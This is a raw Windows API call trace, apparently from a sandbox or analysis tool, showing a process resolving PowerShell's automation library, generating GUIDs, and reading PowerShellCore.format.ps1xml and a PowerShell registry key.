	[0445.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.851] VirtualQuery (in: lpAddress=0x12b5a0, lpBuffer=0x12c460, dwLength=0x30 | out: lpBuffer=0x12c460*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0445.852] VirtualQuery (in: lpAddress=0x12b630, lpBuffer=0x12c4f0, dwLength=0x30 | out: lpBuffer=0x12c4f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0445.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.854] VirtualQuery (in: lpAddress=0x12bdb0, lpBuffer=0x12cc70, dwLength=0x30 | out: lpBuffer=0x12cc70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0445.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.856] VirtualQuery (in: lpAddress=0x12bdb0, lpBuffer=0x12cc70, dwLength=0x30 | out: lpBuffer=0x12cc70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0445.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.859] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xbd5e983f, Data2=0xd489, Data3=0x462d, Data4=([0]=0x93, [1]=0x92, [2]=0x36, [3]=0x94, [4]=0xd7, [5]=0xa0, [6]=0xfb, [7]=0xe1))) returned 0x0
	[0445.862] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x7291820d, Data2=0x6610, Data3=0x49da, Data4=([0]=0xb0, [1]=0x52, [2]=0x54, [3]=0xda, [4]=0x9, [5]=0xf1, [6]=0xf7, [7]=0x62))) returned 0x0
	[0445.862] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x482e7642, Data2=0x209f, Data3=0x4952, Data4=([0]=0xac, [1]=0x57, [2]=0xbe, [3]=0x2a, [4]=0xec, [5]=0x6b, [6]=0x48, [7]=0xc3))) returned 0x0
	[0445.866] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x6910cfd, Data2=0xa86a, Data3=0x47a7, Data4=([0]=0xad, [1]=0xb5, [2]=0xf6, [3]=0x8c, [4]=0xba, [5]=0x38, [6]=0x64, [7]=0xfc))) returned 0x0
	[0445.869] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x508a6ebf, Data2=0x4744, Data3=0x442b, Data4=([0]=0xb6, [1]=0x3e, [2]=0x5a, [3]=0xda, [4]=0x62, [5]=0xbb, [6]=0x3a, [7]=0x9c))) returned 0x0
	[0445.870] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x3ef53879, Data2=0xdf01, Data3=0x4d0e, Data4=([0]=0x92, [1]=0x2b, [2]=0xcd, [3]=0xd2, [4]=0x32, [5]=0xd1, [6]=0x7, [7]=0x93))) returned 0x0
	[0445.870] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x477a9102, Data2=0x9eb7, Data3=0x4044, Data4=([0]=0xbe, [1]=0x2d, [2]=0xc6, [3]=0x68, [4]=0xb4, [5]=0xb4, [6]=0xfb, [7]=0xc5))) returned 0x0
	[0445.870] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xb50c7c4, Data2=0xa6f0, Data3=0x43e3, Data4=([0]=0xb0, [1]=0x8d, [2]=0x9f, [3]=0x93, [4]=0xf3, [5]=0x23, [6]=0xb6, [7]=0x6c))) returned 0x0
	[0445.870] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x3aa6c20d, Data2=0x6468, Data3=0x4a99, Data4=([0]=0xbd, [1]=0x37, [2]=0x70, [3]=0x9a, [4]=0xac, [5]=0x4, [6]=0x21, [7]=0x11))) returned 0x0
	[0445.871] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x3f013020, Data2=0xf1cd, Data3=0x488c, Data4=([0]=0x89, [1]=0xd7, [2]=0xf6, [3]=0x46, [4]=0xa6, [5]=0xc4, [6]=0x15, [7]=0xd5))) returned 0x0
	[0445.871] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x2e989058, Data2=0x8f8a, Data3=0x4854, Data4=([0]=0xa9, [1]=0xdb, [2]=0xc7, [3]=0xb3, [4]=0x5, [5]=0xc, [6]=0xc9, [7]=0xe5))) returned 0x0
	[0445.871] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x8ebf4988, Data2=0xaf24, Data3=0x4b33, Data4=([0]=0x8c, [1]=0xed, [2]=0xdd, [3]=0x1d, [4]=0x7f, [5]=0x4e, [6]=0xb, [7]=0x91))) returned 0x0
	[0445.873] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x7b186643, Data2=0x8ccb, Data3=0x4787, Data4=([0]=0xa5, [1]=0x3c, [2]=0x6, [3]=0xca, [4]=0x34, [5]=0x6b, [6]=0xc6, [7]=0x77))) returned 0x0
	[0445.875] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xb6a991b4, Data2=0x8bbe, Data3=0x44db, Data4=([0]=0xa3, [1]=0x8c, [2]=0xdb, [3]=0xda, [4]=0x73, [5]=0x81, [6]=0x1c, [7]=0x37))) returned 0x0
	[0445.877] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x5366ab8e, Data2=0x88af, Data3=0x4527, Data4=([0]=0x8d, [1]=0x7b, [2]=0x41, [3]=0x6e, [4]=0xc8, [5]=0xc9, [6]=0xf3, [7]=0xa0))) returned 0x0
	[0445.877] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xa3de0661, Data2=0xba8b, Data3=0x41ec, Data4=([0]=0xb6, [1]=0xc, [2]=0x42, [3]=0x7e, [4]=0x60, [5]=0x4b, [6]=0xd1, [7]=0xc0))) returned 0x0
	[0445.877] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xa365b8c8, Data2=0xdca2, Data3=0x488f, Data4=([0]=0xa5, [1]=0x66, [2]=0xf8, [3]=0x19, [4]=0x8f, [5]=0xdc, [6]=0x4f, [7]=0x5b))) returned 0x0
	[0445.878] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x3767d348, Data2=0x24d3, Data3=0x4126, Data4=([0]=0xbe, [1]=0x9a, [2]=0xf6, [3]=0xdb, [4]=0xd2, [5]=0x92, [6]=0xa5, [7]=0xb6))) returned 0x0
	[0445.878] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xfa8257f4, Data2=0x1fd3, Data3=0x4232, Data4=([0]=0x83, [1]=0x59, [2]=0x56, [3]=0xe2, [4]=0xe4, [5]=0xc8, [6]=0xd5, [7]=0xc2))) returned 0x0
	[0445.878] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x699bad92, Data2=0xb346, Data3=0x4ed6, Data4=([0]=0xb8, [1]=0xa9, [2]=0xd8, [3]=0x1a, [4]=0xc9, [5]=0x6e, [6]=0xfb, [7]=0xe5))) returned 0x0
	[0445.879] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x310de88d, Data2=0x5a99, Data3=0x4d8f, Data4=([0]=0xa5, [1]=0xcd, [2]=0x8b, [3]=0x6d, [4]=0x3, [5]=0x8c, [6]=0x84, [7]=0xcf))) returned 0x0
	[0445.879] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xfaf5a096, Data2=0x4092, Data3=0x489f, Data4=([0]=0x94, [1]=0x68, [2]=0xa1, [3]=0x5, [4]=0x82, [5]=0x87, [6]=0xc, [7]=0xe0))) returned 0x0
	[0445.879] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0445.879] GetFileType (hFile=0x2fc) returned 0x1
	[0445.879] SetErrorMode (uMode=0x1) returned 0x1
	[0445.879] GetFileType (hFile=0x2fc) returned 0x1
	[0445.879] ReadFile (in: hFile=0x2fc, lpBuffer=0x3a9da10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3a9da10*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.881] ReadFile (in: hFile=0x2fc, lpBuffer=0x3a9da10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3a9da10*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.881] ReadFile (in: hFile=0x2fc, lpBuffer=0x3a9da10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3a9da10*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.881] ReadFile (in: hFile=0x2fc, lpBuffer=0x3a9da10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3a9da10*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.881] ReadFile (in: hFile=0x2fc, lpBuffer=0x3a9da10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3a9da10*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.882] ReadFile (in: hFile=0x2fc, lpBuffer=0x3a9da10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3a9da10*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.882] ReadFile (in: hFile=0x2fc, lpBuffer=0x3a9da10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3a9da10*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.883] ReadFile (in: hFile=0x2fc, lpBuffer=0x3a9da10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3a9da10*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.883] ReadFile (in: hFile=0x2fc, lpBuffer=0x3a9da10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3a9da10*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.883] ReadFile (in: hFile=0x2fc, lpBuffer=0x3a9da10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3a9da10*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.884] ReadFile (in: hFile=0x2fc, lpBuffer=0x3a9da10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3a9da10*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.884] ReadFile (in: hFile=0x2fc, lpBuffer=0x3a9da10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3a9da10*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.884] ReadFile (in: hFile=0x2fc, lpBuffer=0x3a9da10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3a9da10*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.884] ReadFile (in: hFile=0x2fc, lpBuffer=0x3a9da10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3a9da10*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.885] ReadFile (in: hFile=0x2fc, lpBuffer=0x3a9da10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3a9da10*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.885] ReadFile (in: hFile=0x2fc, lpBuffer=0x3a9da10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3a9da10*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.885] ReadFile (in: hFile=0x2fc, lpBuffer=0x3a9da10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3a9da10*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.886] ReadFile (in: hFile=0x2fc, lpBuffer=0x3a9da10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3a9da10*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.887] ReadFile (in: hFile=0x2fc, lpBuffer=0x3a9da10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3a9da10*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.887] ReadFile (in: hFile=0x2fc, lpBuffer=0x3a9da10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3a9da10*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.887] ReadFile (in: hFile=0x2fc, lpBuffer=0x3a9da10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3a9da10*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.887] ReadFile (in: hFile=0x2fc, lpBuffer=0x3a9da10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3a9da10*, lpNumberOfBytesRead=0x12d2d8*=0xe67, lpOverlapped=0x0) returned 1
	[0445.887] ReadFile (in: hFile=0x2fc, lpBuffer=0x3a9cfdf, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3a9cfdf*, lpNumberOfBytesRead=0x12d2d8*=0x0, lpOverlapped=0x0) returned 1
	[0445.888] ReadFile (in: hFile=0x2fc, lpBuffer=0x3a9da10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3a9da10*, lpNumberOfBytesRead=0x12d2d8*=0x0, lpOverlapped=0x0) returned 1
	[0445.888] CloseHandle (hObject=0x2fc) returned 1
	[0445.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0445.888] SetErrorMode (uMode=0x1) returned 0x1
	[0445.888] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d280 | out: lpFileInformation=0x12d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0445.888] SetErrorMode (uMode=0x1) returned 0x1
	[0445.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0445.889] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d368 | out: phkResult=0x12d368*=0x2fc) returned 0x0
	[0445.889] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d2ec, lpData=0x0, lpcbData=0x12d2e8*=0x0 | out: lpType=0x12d2ec*=0x1, lpData=0x0, lpcbData=0x12d2e8*=0x56) returned 0x0
	[0445.889] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d1ea0
	[0445.889] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d2bc, lpData=0x1b7d1ea0, lpcbData=0x12d2b8*=0x56 | out: lpType=0x12d2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d2b8*=0x56) returned 0x0
	[0445.889] CoTaskMemFree (pv=0x1b7d1ea0) 
	[0445.889] RegCloseKey (hKey=0x2fc) returned 0x0
	[0445.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0445.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
